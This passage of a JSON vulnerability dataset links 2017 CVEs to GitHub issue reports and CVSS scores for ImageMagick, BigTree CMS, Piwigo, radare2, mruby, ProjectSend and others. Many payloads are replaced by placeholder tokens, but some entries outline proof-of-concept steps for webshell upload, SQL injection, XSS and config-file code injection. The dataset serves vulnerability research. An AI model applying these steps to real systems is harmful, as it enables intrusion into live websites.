  15690. "impactScore": 1.4,
  15691. "exploitabilityScore": 3.9
  15692. },
  15693. {
  15694. "CVE_ID": "CVE-2017-9439",
  15695. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/460",
  15696. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/460",
  15697. "Repo_new": "imagemagick/imagemagick",
  15698. "Issue_Created_At": "2017-04-28T04:02:49Z",
  15699. "description": "memory leak in APITAG . on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG d NUMBERTAG fcb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG f3a3 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d0b0bb NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Credit: APITAG of Venustech",
  15700. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15701. "severity": "MEDIUM",
  15702. "baseScore": 6.5,
  15703. "impactScore": 3.6,
  15704. "exploitabilityScore": 2.8
  15705. },
  15706. {
  15707. "CVE_ID": "CVE-2017-9440",
  15708. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/462",
  15709. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/462",
  15710. "Repo_new": "imagemagick/imagemagick",
  15711. "Issue_Created_At": "2017-04-28T04:10:28Z",
  15712. "description": "memory leak in APITAG . on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fcc6d NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG fcc NUMBERTAG adfd NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG c6e1 in APITAG APITAG NUMBERTAG e7d1 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fcc NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG APITAG of Venustech",
  15713. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15714. "severity": "MEDIUM",
  15715. "baseScore": 6.5,
  15716. "impactScore": 3.6,
  15717. "exploitabilityScore": 2.8
  15718. },
  15719. {
  15720. "CVE_ID": "CVE-2017-9441",
  15721. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/290",
  15722. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/290",
  15723. "Repo_new": "bigtreecms/bigtree-cms",
  15724. "Issue_Created_At": "2017-06-05T08:32:27Z",
  15725. "description": "Cross site Scripting (XSS) in bigtreecms NUMBERTAG Multiple Security Issue of XSS exists in APITAG CMS Less than NUMBERTAG file\uff1a ERRORTAG title\u3001version\u3001author_name not filter by APITAG function POC\uff1a in url\uff1a URLTAG upload FILETAG \uff0cthere is FILETAG in FILETAG ERRORTAG when upload xfkxfk.zip successful, result in a xss vuln (you can also build extensions, then download extensions, final modify extension and install it) FILETAG please use APITAG function to filter params~ thank you~ email \uff1a EMAILTAG",
  15726. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  15727. "severity": "MEDIUM",
  15728. "baseScore": 5.4,
  15729. "impactScore": 2.7,
  15730. "exploitabilityScore": 2.3
  15731. },
  15732. {
  15733. "CVE_ID": "CVE-2017-9442",
  15734. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/291",
  15735. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/291",
  15736. "Repo_new": "bigtreecms/bigtree-cms",
  15737. "Issue_Created_At": "2017-06-05T08:53:02Z",
  15738. "description": "getshell in bigtreecms NUMBERTAG Multiple Security Issue of code execution exists in APITAG CMS Less than NUMBERTAG FILE\uff1a PATHTAG ERRORTAG we can upload a zip file which containing the PHP code\uff0c then Unpacked to PATHTAG POC NUMBERTAG build extension APITAG modules, templates, callouts, field types, feeds, and settings to your extension. APITAG additional files to your extension NUMBERTAG create extension NUMBERTAG download extension\uff08a zip file NUMBERTAG modify webshell content to php file in extension\uff08a zip file NUMBERTAG install extension NUMBERTAG the shell in PATHTAG FILETAG thank you~ email \uff1a EMAILTAG",
  15739. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  15740. "severity": "HIGH",
  15741. "baseScore": 8.8,
  15742. "impactScore": 5.9,
  15743. "exploitabilityScore": 2.8
  15744. },
  15745. {
  15746. "CVE_ID": "CVE-2017-9443",
  15747. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/292",
  15748. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/292",
  15749. "Repo_new": "bigtreecms/bigtree-cms",
  15750. "Issue_Created_At": "2017-06-05T08:59:45Z",
  15751. "description": "SQL code execution in bigtreecms NUMBERTAG Multiple Security Issue of SQL code execution exists in APITAG CMS Less than NUMBERTAG FILE\uff1a PATHTAG CODETAG continue APITAG function PATHTAG ERRORTAG Note here\uff1a > APITAG as $table_name => $sql_statement > sqlquery($sql_statement); we can execute any sql code at here",
  15752. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  15753. "severity": "HIGH",
  15754. "baseScore": 8.8,
  15755. "impactScore": 5.9,
  15756. "exploitabilityScore": 2.8
  15757. },
  15758. {
  15759. "CVE_ID": "CVE-2017-9444",
  15760. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/293",
  15761. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/293",
  15762. "Repo_new": "bigtreecms/bigtree-cms",
  15763. "Issue_Created_At": "2017-06-05T09:50:37Z",
  15764. "description": "Multiple CSRF exists in APITAG CMS Less than NUMBERTAG Multiple Security Issue of CSRF exists in APITAG CMS Less than NUMBERTAG one with the name\u3001password\u3001company parameters to the PATHTAG poc, APITAG CODETAG request FILETAG then you will update developer user's profile. other csrf vuln: URLTAG URLTAG URLTAG repair you my be use APITAG function before do these. thank you ! email: EMAILTAG",
  15765. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15766. "severity": "HIGH",
  15767. "baseScore": 8.8,
  15768. "impactScore": 5.9,
  15769. "exploitabilityScore": 2.8
  15770. },
  15771. {
  15772. "CVE_ID": "CVE-2017-9448",
  15773. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/294",
  15774. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/294",
  15775. "Repo_new": "bigtreecms/bigtree-cms",
  15776. "Issue_Created_At": "2017-06-06T01:53:13Z",
  15777. "description": "Cross site Scripting (XSS) in bigtreecms NUMBERTAG Cross site Scripting (XSS) in bigtreecms NUMBERTAG We can use low privileged\uff08 administrator\uff09 users to attack high privileged\uff08D eveloper\uff09 users POC NUMBERTAG add a administrator user NUMBERTAG login with user NUMBERTAG request URLTAG \uff0csave a published revisions\uff1a > POST PATHTAG HTTP NUMBERTAG Host: APITAG > User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / > Accept Language: zh CN,zh; APITAG US; APITAG > Accept Encoding: gzip, deflate > Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG > Referer: URLTAG > Content Length NUMBERTAG Cookie: > Connection: keep alive > > APITAG > APITAG the param description have a xss vuln NUMBERTAG when the developer user login\uff0c and request\uff1a URLTAG the developer user will be xssed~",
  15778. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  15779. "severity": "MEDIUM",
  15780. "baseScore": 5.4,
  15781. "impactScore": 2.7,
  15782. "exploitabilityScore": 2.3
  15783. },
  15784. {
  15785. "CVE_ID": "CVE-2017-9449",
  15786. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/295",
  15787. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/295",
  15788. "Repo_new": "bigtreecms/bigtree-cms",
  15789. "Issue_Created_At": "2017-06-06T02:46:27Z",
  15790. "description": "SQL injection in bigtreecms NUMBERTAG SQL injection in bigtreecms NUMBERTAG FILE\uff1a PATHTAG at first\uff0c Create the view APITAG then search the view PATHTAG CODETAG continue PATHTAG ERRORTAG here the var $view[\"table\"] has a sqli vuln",
  15791. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  15792. "severity": "HIGH",
  15793. "baseScore": 8.8,
  15794. "impactScore": 5.9,
  15795. "exploitabilityScore": 2.8
  15796. },
  15797. {
  15798. "CVE_ID": "CVE-2017-9451",
  15799. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/34",
  15800. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/34",
  15801. "Repo_new": "flatcore/flatcore-cms",
  15802. "Issue_Created_At": "2017-05-24T08:24:55Z",
  15803. "description": "XSS Vulnerability in FILETAG on APITAG NUMBERTAG Title: XSS Vulnerability in FILETAG Security: Low (visit FILETAG as an administrator) Software: FILETAG Reproduce: (get client cookie information) URLTAG FILETAG reference about XSS: URLTAG url",
  15804. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  15805. "severity": "MEDIUM",
  15806. "baseScore": 6.1,
  15807. "impactScore": 2.7,
  15808. "exploitabilityScore": 2.8
  15809. },
  15810. {
  15811. "CVE_ID": "CVE-2017-9452",
  15812. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/667",
  15813. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/667",
  15814. "Repo_new": "piwigo/piwigo",
  15815. "Issue_Created_At": "2017-05-04T02:12:31Z",
  15816. "description": "Cross Site Scripting(XSS) in page parameter of FILETAG . Latest Version of piwigo is vulnerable to cross site scripting vulnerability in FILETAG , remote attacker may inject and execute arbitrary javascript via the page parameter. HTTP REQUEST: GET APITAG APITAG APITAG tcs7a HTTP NUMBERTAG Host NUMBERTAG APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG Connection: close Upgrade Insecure Requests NUMBERTAG RESPONSE: HTTP NUMBERTAG OK Date: Wed NUMBERTAG May NUMBERTAG GMT Server: APITAG APITAG APITAG APITAG X Powered By: APITAG Expires: Thu NUMBERTAG No NUMBERTAG GMT Cache Control: no store, no cache, must revalidate, post check NUMBERTAG pre check NUMBERTAG Pragma: no cache Connection: close Content Type: text/html; charset=utf NUMBERTAG Content Length NUMBERTAG APITAG APITAG APITAG root APITAG APITAG APITAG APITAG \u6d4f\u89c8\u56fe\u5e93 APITAG APITAG APITAG APITAG alert NUMBERTAG APITAG tcs7a&amp;change_theme NUMBERTAG class=\"tiptip\" title=\"\u66f4\u6539\u7ba1\u7406\u754c\u9762\u4e3a\u6e05\u723d\u6216\u8005\u70ab\u9ed1\u7684\u989c\u8272\"> APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u5e2e\u52a9 APITAG APITAG APITAG APITAG APITAG APITAG \u6ce8\u9500 APITAG APITAG APITAG APITAG .......",
  15817. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  15818. "severity": "MEDIUM",
  15819. "baseScore": 4.8,
  15820. "impactScore": 2.7,
  15821. "exploitabilityScore": 1.7
  15822. },
  15823. {
  15824. "CVE_ID": "CVE-2017-9463",
  15825. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/705",
  15826. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/705",
  15827. "Repo_new": "piwigo/piwigo",
  15828. "Issue_Created_At": "2017-06-13T10:30:13Z",
  15829. "description": "user list backend, check input parameter. To avoid any possible security issue, let's check the input parameters",
  15830. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  15831. "severity": "MEDIUM",
  15832. "baseScore": 6.5,
  15833. "impactScore": 3.6,
  15834. "exploitabilityScore": 2.8
  15835. },
  15836. {
  15837. "CVE_ID": "CVE-2017-9464",
  15838. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/706",
  15839. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/706",
  15840. "Repo_new": "piwigo/piwigo",
  15841. "Issue_Created_At": "2017-06-14T08:11:25Z",
  15842. "description": "[security] identification should redirect within Piwigo only. The APITAG system in FILETAG can lead to redirect outside Piwigo. On any location actually. To avoid any \"open redirect\" security issue, Piwigo should make sure the redirection occurs only within Piwigo, not outside.",
  15843. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  15844. "severity": "MEDIUM",
  15845. "baseScore": 6.1,
  15846. "impactScore": 2.7,
  15847. "exploitabilityScore": 2.8
  15848. },
  15849. {
  15850. "CVE_ID": "CVE-2017-9465",
  15851. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/678",
  15852. "Issue_Url_new": "https://github.com/virustotal/yara/issues/678",
  15853. "Repo_new": "virustotal/yara",
  15854. "Issue_Created_At": "2017-06-06T14:40:43Z",
  15855. "description": "Invalid memory access (potential information disclosure) in APITAG Invalid memory access (potential information disclosure) in APITAG Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN: ERRORTAG",
  15856. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  15857. "severity": "HIGH",
  15858. "baseScore": 7.1,
  15859. "impactScore": 5.2,
  15860. "exploitabilityScore": 1.8
  15861. },
  15862. {
  15863. "CVE_ID": "CVE-2017-9499",
  15864. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/492",
  15865. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/492",
  15866. "Repo_new": "imagemagick/imagemagick",
  15867. "Issue_Created_At": "2017-05-15T18:14:47Z",
  15868. "description": "assertion failed in APITAG on Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in pixel accessor.h. CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  15869. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15870. "severity": "MEDIUM",
  15871. "baseScore": 6.5,
  15872. "impactScore": 3.6,
  15873. "exploitabilityScore": 2.8
  15874. },
  15875. {
  15876. "CVE_ID": "CVE-2017-9500",
  15877. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/500",
  15878. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/500",
  15879. "Repo_new": "imagemagick/imagemagick",
  15880. "Issue_Created_At": "2017-05-23T17:06:00Z",
  15881. "description": "assertion failed in APITAG on Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in profile.c. CODETAG testcase \uff1a URLTAG Credit \uff1a APITAG of Venustech",
  15882. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15883. "severity": "MEDIUM",
  15884. "baseScore": 6.5,
  15885. "impactScore": 3.6,
  15886. "exploitabilityScore": 2.8
  15887. },
  15888. {
  15889. "CVE_ID": "CVE-2017-9501",
  15890. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/491",
  15891. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/491",
  15892. "Repo_new": "imagemagick/imagemagick",
  15893. "Issue_Created_At": "2017-05-15T18:14:07Z",
  15894. "description": "assertion failed in APITAG on Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in semaphore.c. CODETAG testcase \uff1a URLTAG Credit : APITAG of Venustech",
  15895. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15896. "severity": "MEDIUM",
  15897. "baseScore": 6.5,
  15898. "impactScore": 3.6,
  15899. "exploitabilityScore": 2.8
  15900. },
  15901. {
  15902. "CVE_ID": "CVE-2017-9520",
  15903. "Issue_Url_old": "https://github.com/radare/radare2/issues/7698",
  15904. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7698",
  15905. "Repo_new": "radareorg/radare2",
  15906. "Issue_Created_At": "2017-06-07T19:12:45Z",
  15907. "description": "Use after free in APITAG Use after free in APITAG HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
  15908. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15909. "severity": "MEDIUM",
  15910. "baseScore": 5.5,
  15911. "impactScore": 3.6,
  15912. "exploitabilityScore": 1.8
  15913. },
  15914. {
  15915. "CVE_ID": "CVE-2017-9527",
  15916. "Issue_Url_old": "https://github.com/mruby/mruby/issues/3486",
  15917. "Issue_Url_new": "https://github.com/mruby/mruby/issues/3486",
  15918. "Repo_new": "mruby/mruby",
  15919. "Issue_Created_At": "2017-03-07T18:22:46Z",
  15920. "description": "Heap use after free in mark_context_stack. The following input to mruby demonstrates a heap use after free bug: FILETAG To demonstrate, build with clang & ASAN ( APITAG ) or use gcc & valgrind. ASAN report: ERRORTAG Valgrind report: ERRORTAG This issue was reported by URLTAG",
  15921. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15922. "severity": "HIGH",
  15923. "baseScore": 7.8,
  15924. "impactScore": 5.9,
  15925. "exploitabilityScore": 1.8
  15926. },
  15927. {
  15928. "CVE_ID": "CVE-2017-9546",
  15929. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/298",
  15930. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/298",
  15931. "Repo_new": "bigtreecms/bigtree-cms",
  15932. "Issue_Created_At": "2017-06-08T11:33:52Z",
  15933. "description": "Denial of Service in bigtreecms NUMBERTAG Hi, I found a denial of service vulnerability in bigtreecms NUMBERTAG The POC is below: Login with Administrator and edit a page,then add a revision,input APITAG FILETAG Then FILETAG And generate a wrong report, leak the source code,but you can\u2019t save revision any more",
  15934. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
  15935. "severity": "MEDIUM",
  15936. "baseScore": 5.7,
  15937. "impactScore": 3.6,
  15938. "exploitabilityScore": 2.1
  15939. },
  15940. {
  15941. "CVE_ID": "CVE-2017-9547",
  15942. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/297",
  15943. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/297",
  15944. "Repo_new": "bigtreecms/bigtree-cms",
  15945. "Issue_Created_At": "2017-06-08T10:04:12Z",
  15946. "description": "Cross site Scripting (XSS) in bigtreecms NUMBERTAG Hi, I found a cross site scripting vulnerability in bigtreecms NUMBERTAG The POC is below: Login with Administrator and Edit Page FILETAG then click save&preview FILETAG",
  15947. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  15948. "severity": "MEDIUM",
  15949. "baseScore": 5.4,
  15950. "impactScore": 2.7,
  15951. "exploitabilityScore": 2.3
  15952. },
  15953. {
  15954. "CVE_ID": "CVE-2017-9548",
  15955. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/296",
  15956. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/296",
  15957. "Repo_new": "bigtreecms/bigtree-cms",
  15958. "Issue_Created_At": "2017-06-08T05:19:59Z",
  15959. "description": "Stored Cross site Scripting in bigtreecms NUMBERTAG Hi, I found a stored cross site scripting vulnerability in bigtreecms NUMBERTAG The POC is below: With Developer: Edit a page with Template Home FILETAG With Administrator or Normal APITAG a Revision created in Previous step FILETAG FILETAG Click Overwrite,then click save&preview, FILETAG",
  15960. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  15961. "severity": "MEDIUM",
  15962. "baseScore": 5.4,
  15963. "impactScore": 2.7,
  15964. "exploitabilityScore": 2.3
  15965. },
  15966. {
  15967. "CVE_ID": "CVE-2017-9609",
  15968. "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/373",
  15969. "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/373",
  15970. "Repo_new": "blackcatdevelopment/blackcatcms",
  15971. "Issue_Created_At": "2017-06-21T10:29:10Z",
  15972. "description": "XSS in Blackcat cms NUMBERTAG Hello, I would like to report a vulnerability that I have found on Blackcat cms NUMBERTAG in which Cross Site Scripting(XSS) attack is possible. For details please go through attached document. Blackcat cms NUMBERTAG ss POC by Provensec FILETAG Regards, Faiz Ahmed Zaidi",
  15973. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  15974. "severity": "MEDIUM",
  15975. "baseScore": 5.4,
  15976. "impactScore": 2.7,
  15977. "exploitabilityScore": 2.3
  15978. },
  15979. {
  15980. "CVE_ID": "CVE-2017-9621",
  15981. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/185",
  15982. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/185",
  15983. "Repo_new": "Telaxus/EPESI",
  15984. "Issue_Created_At": "2017-05-05T04:06:19Z",
  15985. "description": "Stored Cross Site Scripting. PATHTAG code: APITAG poc: login >menu >language&translations >PHP environment check(all item) > ERRORTAG >confirm FILETAG",
  15986. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  15987. "severity": "MEDIUM",
  15988. "baseScore": 6.1,
  15989. "impactScore": 2.7,
  15990. "exploitabilityScore": 2.8
  15991. },
  15992. {
  15993. "CVE_ID": "CVE-2017-9622",
  15994. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/186",
  15995. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/186",
  15996. "Repo_new": "Telaxus/EPESI",
  15997. "Issue_Created_At": "2017-05-05T06:32:58Z",
  15998. "description": "Multiple Stored Cross Site Scripting NUMBERTAG poc:login >menu >administrator >common data >add array(or change) >key(or value) ERRORTAG >confirm FILETAG NUMBERTAG poc:login >menu >administrator >currencies >new(or edit) >decimal sign > ERRORTAG >save FILETAG NUMBERTAG poc:login >menu >administrator >countries >add array(or change) >key(or value) ERRORTAG >confirm FILETAG",
  15999. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16000. "severity": "MEDIUM",
  16001. "baseScore": 6.1,
  16002. "impactScore": 2.7,
  16003. "exploitabilityScore": 2.8
  16004. },
  16005. {
  16006. "CVE_ID": "CVE-2017-9668",
  16007. "Issue_Url_old": "https://github.com/XiaoZhis/ProjectSend/issues/2",
  16008. "Issue_Url_new": "https://github.com/xiaozhis/projectsend/issues/2",
  16009. "Repo_new": "xiaozhis/projectsend",
  16010. "Issue_Created_At": "2017-06-17T09:14:34Z",
  16011. "description": "CMS Made Simple xss. User & group > group FILETAG FILETAG FILETAG",
  16012. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16013. "severity": "MEDIUM",
  16014. "baseScore": 6.1,
  16015. "impactScore": 2.7,
  16016. "exploitabilityScore": 2.8
  16017. },
  16018. {
  16019. "CVE_ID": "CVE-2017-9735",
  16020. "Issue_Url_old": "https://github.com/eclipse/jetty.project/issues/1556",
  16021. "Issue_Url_new": "https://github.com/eclipse/jetty.project/issues/1556",
  16022. "Repo_new": "eclipse/jetty.project",
  16023. "Issue_Created_At": "2017-05-16T07:33:48Z",
  16024. "description": "A timing channel in APITAG Hi, I found a timing channel in APITAG URLTAG By using APITAG it actually violates the \"constant time implementation\" discipline. For more information about timing attack: URLTAG",
  16025. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  16026. "severity": "HIGH",
  16027. "baseScore": 7.5,
  16028. "impactScore": 3.6,
  16029. "exploitabilityScore": 3.9
  16030. },
  16031. {
  16032. "CVE_ID": "CVE-2017-9741",
  16033. "Issue_Url_old": "https://github.com/XiaoZhis/ProjectSend/issues/1",
  16034. "Issue_Url_new": "https://github.com/xiaozhis/projectsend/issues/1",
  16035. "Repo_new": "xiaozhis/projectsend",
  16036. "Issue_Created_At": "2017-06-17T02:35:39Z",
  16037. "description": "APITAG Code execution. The attacker can change the content of configuration file and constructing the dbprefix parameter to replace the TABLES_PREFIX of the configuration file with malicious code. So attacker can run malicious code remotely. code: if (isset($_POST FILETAG FILETAG",
  16038. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16039. "severity": "CRITICAL",
  16040. "baseScore": 9.8,
  16041. "impactScore": 5.9,
  16042. "exploitabilityScore": 3.9
  16043. },
  16044. {
  16045. "CVE_ID": "CVE-2017-9761",
  16046. "Issue_Url_old": "https://github.com/radare/radare2/issues/7727",
  16047. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7727",
  16048. "Repo_new": "radareorg/radare2",
  16049. "Issue_Created_At": "2017-06-12T13:22:40Z",
  16050. "description": "Heap out of bounds read in APITAG Heap out of bounds read in APITAG Git HEAD NUMBERTAG cba1d Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
  16051. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  16052. "severity": "MEDIUM",
  16053. "baseScore": 5.5,
  16054. "impactScore": 3.6,
  16055. "exploitabilityScore": 1.8
  16056. },
  16057. {
  16058. "CVE_ID": "CVE-2017-9762",
  16059. "Issue_Url_old": "https://github.com/radare/radare2/issues/7726",
  16060. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7726",
  16061. "Repo_new": "radareorg/radare2",
  16062. "Issue_Created_At": "2017-06-12T12:45:13Z",
  16063. "description": "Use after free in APITAG Use after free in APITAG Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
  16064. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  16065. "severity": "MEDIUM",
  16066. "baseScore": 5.5,
  16067. "impactScore": 3.6,
  16068. "exploitabilityScore": 1.8
  16069. },
  16070. {
  16071. "CVE_ID": "CVE-2017-9763",
  16072. "Issue_Url_old": "https://github.com/radare/radare2/issues/7723",
  16073. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7723",
  16074. "Repo_new": "radareorg/radare2",
  16075. "Issue_Created_At": "2017-06-11T17:11:00Z",
  16076. "description": "SIGSEGV APITAG large variable on stack) in APITAG SIGSEGV APITAG large variable on stack) in APITAG Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG More context in Valgrind: ERRORTAG",
  16077. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  16078. "severity": "HIGH",
  16079. "baseScore": 7.5,
  16080. "impactScore": 3.6,
  16081. "exploitabilityScore": 3.9
  16082. },
  16083. {
  16084. "CVE_ID": "CVE-2017-9771",
  16085. "Issue_Url_old": "https://github.com/XiaoZhis/ProjectSend/issues/3",
  16086. "Issue_Url_new": "https://github.com/xiaozhis/projectsend/issues/3",
  16087. "Repo_new": "xiaozhis/projectsend",
  16088. "Issue_Created_At": "2017-06-20T18:59:54Z",
  16089. "description": "wb Code execution. The attacker can change the content of configuration file and constructing the database_username And many other parameters to replace the DB_USERNAME of the configuration file with malicious code. So attacker can run malicious command remotely. code: $debug = false; if (true === $debug) { ini_set('display_errors NUMBERTAG error_reporting(E_ALL); } // Start a session if (!defined('SESSION_STARTED')) { session_name('wb installer'); APITAG define('SESSION_STARTED', true); } // get random part for APITAG list($usec,$sec) = explode(' APITAG APITAG NUMBERTAG session_rand = rand NUMBERTAG Function to set error function set_error($message, $field_name = '') { // global $_POST; if (isset($message) AND $message != '') { // Copy values entered into session so user doesn't have to re enter everything if (isset($_POST FILETAG",
  16090. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16091. "severity": "CRITICAL",
  16092. "baseScore": 9.8,
  16093. "impactScore": 5.9,
  16094. "exploitabilityScore": 3.9
  16095. },
  16096. {
